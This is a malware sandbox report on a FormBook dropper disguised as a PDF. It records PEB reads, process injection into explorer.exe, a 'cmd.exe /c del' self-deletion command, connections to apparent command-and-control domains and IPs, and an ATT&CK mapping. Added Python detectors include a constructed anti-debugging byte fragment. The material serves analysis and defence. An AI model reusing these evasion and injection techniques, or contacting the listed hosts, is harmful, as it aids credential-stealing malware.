          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]3_2_00AC8794
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]3_2_00AF37F5
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]3_2_00AEE730
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]3_2_00ADF716
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]3_2_00ACFF60
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]3_2_00B88F6A
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]3_2_00ACEF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338E730 mov eax, dword ptr fs:[00000030h]8_2_0338E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428B58 mov eax, dword ptr fs:[00000030h]8_2_03428B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03354F2E mov eax, dword ptr fs:[00000030h]8_2_03354F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03354F2E mov eax, dword ptr fs:[00000030h]8_2_03354F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428F6A mov eax, dword ptr fs:[00000030h]8_2_03428F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EFF10 mov eax, dword ptr fs:[00000030h]8_2_033EFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033EFF10 mov eax, dword ptr fs:[00000030h]8_2_033EFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03383B7A mov eax, dword ptr fs:[00000030h]8_2_03383B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03383B7A mov eax, dword ptr fs:[00000030h]8_2_03383B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342070D mov eax, dword ptr fs:[00000030h]8_2_0342070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0342070D mov eax, dword ptr fs:[00000030h]8_2_0342070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335DB60 mov ecx, dword ptr fs:[00000030h]8_2_0335DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336FF60 mov eax, dword ptr fs:[00000030h]8_2_0336FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0341131B mov eax, dword ptr fs:[00000030h]8_2_0341131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335F358 mov eax, dword ptr fs:[00000030h]8_2_0335F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335DB40 mov eax, dword ptr fs:[00000030h]8_2_0335DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336EF40 mov eax, dword ptr fs:[00000030h]8_2_0336EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03361B8F mov eax, dword ptr fs:[00000030h]8_2_03361B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03361B8F mov eax, dword ptr fs:[00000030h]8_2_03361B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340D380 mov ecx, dword ptr fs:[00000030h]8_2_0340D380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0341138A mov eax, dword ptr fs:[00000030h]8_2_0341138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03425BA5 mov eax, dword ptr fs:[00000030h]8_2_03425BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335E620 mov eax, dword ptr fs:[00000030h]8_2_0335E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340B260 mov eax, dword ptr fs:[00000030h]8_2_0340B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340B260 mov eax, dword ptr fs:[00000030h]8_2_0340B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03428A62 mov eax, dword ptr fs:[00000030h]8_2_03428A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335C600 mov eax, dword ptr fs:[00000030h]8_2_0335C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0339927A mov eax, dword ptr fs:[00000030h]8_2_0339927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336766D mov eax, dword ptr fs:[00000030h]8_2_0336766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03359240 mov eax, dword ptr fs:[00000030h]8_2_03359240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340FE3F mov eax, dword ptr fs:[00000030h]8_2_0340FE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0340FEC0 mov eax, dword ptr fs:[00000030h]8_2_0340FEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338FAB0 mov eax, dword ptr fs:[00000030h]8_2_0338FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033552A5 mov eax, dword ptr fs:[00000030h]8_2_033552A5
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033552A5: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03428ED6: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033D46A7: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338D294: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033EFE87: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033676E2: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033816E0: mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03420EA5: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033836CC: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338513A: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03363D34: mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03384D3B: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0335AD30: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03374120: mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03359100: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0337C577: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0335B171: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03377D50: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0337B944: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03428D34: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03393D43: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033D3540: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033835A1: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338FD9B: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03408DF1: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0337C182: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338A185: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03352D8A: mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0335B1E1: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338BC2C: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0336B02A: mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033D7016: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03412073: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03421074: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03411C06: mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0342740D: mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03424015: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0337746D: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03370050: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033EC450: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_0338F0BF: mov ecx, dword ptr fs:[00000030h] (1 occurrence); mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03428CD6: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033990AF: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_03359080: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033D3884: mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_034114FB: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function 8_2_033EB8D0: mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug
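Every line above is the same instruction: a read of fs:[0x30], which in a 32-bit (here WOW64) process is the pointer to the Process Environment Block. Malware reads the PEB to check BeingDebugged, walk the loader list for DLL base addresses without calling GetModuleHandle, or read NtGlobalFlag, which is why the report's "Contains functionality to read the PEB" signature flags it. The following is an added example, not Joe Sandbox's signature engine or any code from the sample: a byte-pattern scanner for the IA-32 encodings of `mov r32, dword ptr fs:[0x30]` run over a constructed code fragment. The opcode encodings are standard; the sample bytes and the base address used for display are this example's own.

```python
"""Scan raw 32-bit x86 code for reads of the PEB pointer at fs:[0x30].

Added example, not part of the sandbox report. The code fragment in SAMPLE is
constructed for illustration; the encodings are standard IA-32.
"""
import re

# Encodings of `mov r32, dword ptr fs:[0x30]` in 32-bit code:
#   64 A1 30 00 00 00          segment override + moffs32 short form (eax only)
#   64 8B /r 30 00 00 00       segment override + mov r32, r/m32 with
#                              ModRM mod=00 rm=101 (disp32); reg field = destination
_PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)
_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def find_peb_reads(code, base=0):
    """Return [(address, mnemonic), ...] for every fs:[0x30] read in `code`."""
    hits = []
    for m in _PEB_READ.finditer(code):
        raw = m.group(0)
        if raw[1] == 0xA1:
            reg = "eax"                        # short form has an implicit eax
        else:
            reg = _REGS[(raw[2] >> 3) & 7]     # ModRM reg field selects r32
        hits.append((base + m.start(), f"mov {reg}, dword ptr fs:[00000030h]"))
    return hits


def summarize(hits):
    """Count reads per destination register, the way a triage note tallies them."""
    counts = {}
    for _, mnemonic in hits:
        reg = mnemonic.split()[1].rstrip(",")
        counts[reg] = counts.get(reg, 0) + 1
    return counts


# Constructed fragment: PEB-based debugger check followed by a loader-list walk.
SAMPLE = bytes.fromhex(
    "64A130000000"      # mov   eax, dword ptr fs:[0x30]   ; PEB
    "0FB64002"          # movzx eax, byte ptr [eax+2]      ; PEB->BeingDebugged
    "85C0"              # test  eax, eax
    "7510"              # jne   short +0x10                ; bail out if debugged
    "648B0D30000000"    # mov   ecx, dword ptr fs:[0x30]   ; PEB again
    "8B490C"            # mov   ecx, [ecx+0x0C]            ; PEB->Ldr
    "C3"                # ret
)

if __name__ == "__main__":
    for addr, mnemonic in find_peb_reads(SAMPLE, base=0x03363D34):
        print(f"{addr:08X}  {mnemonic}")
    print(summarize(find_peb_reads(SAMPLE)))
```

A pure byte scan cannot tell code from data, so a hit inside a string table or resource is possible; that is why the report attributes each hit to a disassembled function rather than to a raw offset, and why the same function can appear many times (one line per read).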

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 206.189.174.29:80
Source: C:\Windows\explorer.exe | Domain query: www.xcash.fund
Source: C:\Windows\explorer.exe | Network Connect: 94.46.58.25:80
Source: C:\Windows\explorer.exe | Domain query: www.antiracismbyu.com
Source: C:\Windows\explorer.exe | Domain query: www.fabulousfalafel.com
Source: C:\Windows\explorer.exe | Domain query: www.capacitaciondelfuturo.com
Source: C:\Windows\explorer.exe | Domain query: www.maggionaossurvey.com
Source: C:\Windows\explorer.exe | Network Connect: 172.67.161.235:80
Source: C:\Windows\explorer.exe | Domain query: www.somht.com
Source: C:\Windows\explorer.exe | Domain query: www.michaelroberts.gallery
Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.197:80
Source: C:\Windows\explorer.exe | Domain query: www.fenixforex.com
Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25:80
Source: C:\Windows\explorer.exe | Domain query: www.casinoflames.com
Source: C:\Windows\explorer.exe | Domain query: www.yyxingfa.com
Source: C:\Windows\explorer.exe | Domain query: www.verratjewelry.com
Source: C:\Windows\explorer.exe | Network Connect: 185.18.52.85:80
Source: C:\Windows\explorer.exe | Network Connect: 172.106.71.28:80
Source: C:\Windows\explorer.exe | Domain query: www.best10hostings.com
Source: C:\Windows\explorer.exe | Network Connect: 108.167.156.70:80
Source: C:\Windows\explorer.exe | Network Connect: 103.48.133.159:80
Source: C:\Windows\explorer.exe | Domain query: www.mantequillahub.pro

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Section loaded: unknown | target: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\wlanext.exe | protection: execute and read and write
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\wlanext.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3472

Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Thread APC queued: target process: C:\Windows\explorer.exe

Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Process created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
Source: explorer.exe, 00000004.00000002.509689637.0000000005EA0000.00000004.00000001.sdmp; wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp; wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp; wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000002.496367445.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp; wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000002.497194428.0000000001640000.00000002.00000001.sdmp; wlanext.exe, 00000008.00000002.500098080.0000000005950000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exe | Code function 2_2_0040326F: EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
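Read together, the events above form the FormBook migration chain: the dropper maps an executable-and-writable section into explorer.exe, redirects one of its threads (context change plus a queued APC), and from then on the network activity (DNS queries and port-80 connections to the C2 domain set) is attributed to explorer.exe; the injected code then launches wlanext.exe, which injects back into explorer.exe and runs `cmd.exe /c del` to remove the original dropper. The block below is an added example, not Joe Sandbox's signature engine or any code from the sample: it replays a constructed event list modelled on the lines above and emits the two verdicts a detection would raise, "system process connects to network after being injected into" and "sample deletes itself". The event layout is this example's own, and it assumes the thread-context target PID 3472 in the report resolves to explorer.exe, which the APC target line supports.

```python
"""Correlate sandbox behavior events into a process-injection chain.

Added example, not Joe Sandbox's signature engine. EVENTS is constructed to
mirror the report's lines (section mapped into another process with its page
protection, thread context set, APC queued, network activity, process creation).
The tuple layout and the PID 3472 -> explorer.exe resolution are assumptions.
"""
from collections import defaultdict

# Windows binaries that do not originate outbound traffic on their own; a
# connection from one of them after it was injected into is the signal.
SYSTEM_PROCESSES = {r"c:\windows\explorer.exe", r"c:\windows\syswow64\wlanext.exe"}

DROPPER = r"C:\Users\user\Desktop\MV Sky Marine_pdf.exe"
EXPLORER = r"C:\Windows\explorer.exe"
WLANEXT = r"C:\Windows\SysWOW64\wlanext.exe"

# (source process, event kind, (target or detail, extra)) -- constructed events
EVENTS = [
    (DROPPER, "section_map", (EXPLORER, "execute and read and write")),
    (DROPPER, "thread_ctx", (EXPLORER, None)),   # report: target PID 3472, assumed explorer.exe
    (DROPPER, "apc_queue", (EXPLORER, None)),
    (EXPLORER, "net_connect", ("206.189.174.29", 80)),
    (EXPLORER, "dns_query", ("www.xcash.fund", None)),
    (EXPLORER, "process_create", (WLANEXT, None)),
    (WLANEXT, "section_map", (EXPLORER, "read write")),
    (WLANEXT, "section_map", (EXPLORER, "execute and read and write")),
    (WLANEXT, "process_create", (r"C:\Windows\SysWOW64\cmd.exe /c del '" + DROPPER + "'", None)),
    # Benign controls: a read-only mapping, and traffic from a non-system process.
    (r"C:\Windows\System32\svchost.exe", "section_map", (EXPLORER, "read")),
    (r"C:\Program Files\Browser\browser.exe", "net_connect", ("203.0.113.10", 443)),
]


def find_injections(events):
    """target -> (index of first injection event, sorted list of injecting sources).

    Executable section mappings, thread-context changes and queued APCs count;
    read-only or read-write mappings alone do not.
    """
    first, sources = {}, defaultdict(set)
    for i, (src, kind, (target, detail)) in enumerate(events):
        executable_map = kind == "section_map" and "execute" in (detail or "")
        if executable_map or kind in ("thread_ctx", "apc_queue"):
            key = target.lower()
            first.setdefault(key, i)
            sources[key].add(src)
    return {k: (first[k], sorted(v)) for k, v in sources.items()}


def injected_system_network(events):
    """Network events by a system process that occur after it was injected into."""
    injected = find_injections(events)
    hits = []
    for i, (src, kind, (where, port)) in enumerate(events):
        key = src.lower()
        if (kind in ("net_connect", "dns_query") and key in SYSTEM_PROCESSES
                and key in injected and i > injected[key][0]):
            hits.append((src, where, port))
    return hits


def self_delete_commands(events, sample_path):
    """Command lines that delete the original sample after it migrated elsewhere."""
    needle = sample_path.lower()
    return [cmd for _, kind, (cmd, _) in events
            if kind == "process_create" and "cmd.exe" in cmd.lower()
            and " del " in cmd.lower() and needle in cmd.lower()]


if __name__ == "__main__":
    for target, (idx, srcs) in find_injections(EVENTS).items():
        print(f"injected: {target} by {srcs} (first at event {idx})")
    for src, where, port in injected_system_network(EVENTS):
        print(f"system process connects to network: {src} -> {where}:{port}")
    for cmd in self_delete_commands(EVENTS, DROPPER):
        print(f"self-delete: {cmd}")
```

Ordering matters: the connection is only suspicious once the process has received executable memory or a hijacked thread, so the check compares event indices rather than just membership. The read-write mapping from wlanext.exe is deliberately ignored; on its own it is how legitimate shared memory looks.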

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: the same 14 Yara matches (8 memory dumps, 6 unpacked PE files) listed under Stealing of Sensitive Information.

Mitre Att&ck Matrix

The matrix is listed per tactic. A number after a technique is the report's hit count for that technique (rendered as superscripts in the original); techniques without a number are listed by the matrix but were not observed for this sample.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 412; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Virtualization/Sandbox Evasion 3; Process Injection 412; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 11; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 231; Virtualization/Sandbox Evasion 3; Process Discovery 3; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data 1; Clipboard Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

Behavior Graph

Behavior Graph ID: 372691 | Sample: MV Sky Marine_pdf.exe | Start date: 22/03/2021 | Architecture: WINDOWS | Score: 100

Top-level DNS/IP info: www.rahasiasuksesbo.com; www.cvhrcm.com; rahasiasuksesbo.com
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree (as drawn in the graph):
MV Sky Marine_pdf.exe (started)
    dropped: C:\Users\user\AppData\Local\...\lckp0.dll, PE32
    signature: Maps a DLL or memory area into another process
    +-- MV Sky Marine_pdf.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
        +-- explorer.exe (injected)
